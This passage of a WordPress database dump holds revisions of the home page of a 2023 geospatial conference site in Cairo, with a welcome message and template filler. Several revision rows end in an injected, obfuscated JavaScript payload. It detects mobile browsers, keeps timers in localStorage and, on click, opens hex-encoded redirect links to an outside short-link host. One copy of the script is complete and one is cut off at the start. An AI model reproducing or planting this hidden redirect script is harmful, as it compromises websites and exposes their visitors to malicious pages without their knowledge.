_0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-04 01:30:04','2022-10-04 01:30:04','',2167,'https://gsw2023.com/?p=2269',0,'revision','',0),
(2270,1,'2022-10-04 01:40:01','2022-10-04 01:40:01','','dr-ismael','','inherit','open','closed','','dr-ismael','','','2023-06-03 10:49:36','2023-06-03 10:49:36','',3233,'https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael.png',0,'attachment','image/png',0),
(2271,1,'2022-10-04 01:40:47','2022-10-04 01:40:47','','dr-ismael','','inherit','open','closed','','dr-ismael-2','','','2022-10-04 01:40:47','2022-10-04 01:40:47','',2167,'https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png',0,'attachment','image/png',0),
(2272,1,'2022-10-04 01:46:24','2022-10-04 01:46:24','','dr-naser','','inherit','open','closed','','dr-naser','','','2022-10-04 01:46:24','2022-10-04 01:46:24','',2167,'https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg',0,'attachment','image/jpeg',0),
(2273,1,'2022-10-04 01:47:43','2022-10-04 01:47:43','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]</p>\n<p style=\"text-align: left;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. It is the primary factor for human achievements throughout all ages. AASTMT has a host of qualified professors and experts who are capable of supporting Arab and African countries in various scientific fields. The GSW will provide a platform for international scholars, graduate students, future scientists and industrial sectors to learn exchange knowledge and experiences of applying geospatial technologies for sustainable development for better quality of life for people around the world. We would like to take this opportunity to welcome you to Cairo a vibrant, exhilarating, exotic, fascinating and welcoming city. Home to the best Pharaonic, Coptic and Islamic sights in Egypt. Cairo is where you never know what incredible, half-forgotten monument you might stumble across while wandering around. Enjoy the Nile view, visit the great pyramids of Giza, walk through the capital\'s medieval markets by Khan El-Khalili, or walk down the Nile promenade. We look forward to working with the ISPRS council, commissions presidents, working group officers, and other sister organizations to have a successful technical program and a memorable social program. It is great to have the GSW coming to Egypt where most probably the first mapping systems were developed 1000s years ago. Welcome to GSW\'2023 in Cairo, Egypt.</p>\n<p>[/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" bg_type=\"bg_color\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529517572787{padding-top: 70px !important;padding-bottom: 55px !important;}\" bg_color_value=\"rgba(170,170,170,0.1)\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"How can we help you?\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]Our job is nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan, quis maximus urna venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-1 vc_col-lg-10 vc_col-md-offset-0 vc_col-md-12\"][vc_row_inner content_placement=\"top\"][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-users\" icon_size=\"24\" icon_color=\"\" title=\"Agile team\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529526716112{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-sitemap\" icon_size=\"24\" icon_color=\"\" title=\"Scrum\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517895768{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-window-restore\" icon_size=\"24\" icon_color=\"\" title=\"TDD\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529517964919{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-code\" icon_size=\"24\" icon_color=\"\" title=\"Clean code\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518016290{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-thumbs-up\" icon_size=\"24\" icon_color=\"\" title=\"Quality software\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518063362{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-rocket\" icon_size=\"24\" icon_color=\"\" title=\"Innovative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518383809{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon=\"icomoon-fontawesome-16x16-gem\" icon_size=\"24\" icon_color=\"\" title=\"Cost effective\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518233084{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-check-square\" icon_size=\"24\" icon_color=\"\" title=\"Transparent &amp; honest\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518135334{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][bsf-info-box icon=\"icomoon-fontawesome-16x16-lightbulb\" icon_size=\"24\" icon_color=\"\" title=\"Creative\" el_class=\"accent-icon-color\" title_font=\"font_family:|font_call:\" title_font_style=\"font-weight:700;\" css_info_box=\".vc_custom_1529518683161{margin-bottom: 30px !important;}\" title_font_size=\"desktop:18px;\" title_font_line_height=\"desktop:28px;\"][/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"``The time is always right to do what is right!``\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529525768333{padding-top: 70px !important;padding-bottom: 75px !important;}\"][vc_column offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Our latest projects\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]We provides a full spectrum s nisi lectus, pharetra eget leo id, hendrerit ultricies magna. Duis bibendum quam in elit accumsan venenatis.[/ultimate_heading][/vc_column][vc_column offset=\"vc_col-lg-offset-0 vc_col-lg-12 vc_col-md-offset-0 vc_col-md-12\"][dt_portfolio_carousel dis_posts_total=\"12\" content_alignment=\"center\" custom_content_bg_color=\"#f7f7f7\" post_content_paddings=\"20px 30px 30px 30px\" resized_image_dimensions=\"3x2\" image_border_radius=\"0px\" image_paddings=\"20px 20px 0px 20px\" slides_on_wide_desk=\"3\" slides_on_lapt=\"2\" slides_on_h_tabs=\"2\" slides_on_v_tabs=\"1\" post_title_font_size=\"22px\" post_title_line_height=\"32px\" post_date=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"default_button\" read_more_button_text=\"Details\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" next_icon=\"icon-ar-013-r\" prev_icon=\"icon-ar-013-l\" arrow_icon_size=\"32px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" arrow_icon_color=\"rgba(0,0,0,0.15)\" arrows_bg_show=\"n\" arrow_icon_color_hover=\"\" arrows_bg_hover_show=\"n\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"Have a project you\'d like to talk about?\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Sed consequat erat vitae odio placerat, vel malesuada mi convallis we can help![/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527107907{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]VIEW SHOWCASE[/dt_default_button][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-04 01:47:43','2022-10-04 01:47:43','',2167,'https://gsw2023.com/?p=2273',0,'revision','',0),
(2274,1,'2022-10-04 01:59:29','2022-10-04 01:59:29','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"]</p>\n<p style=\"text-align: left;\">As we celebrate our 50th 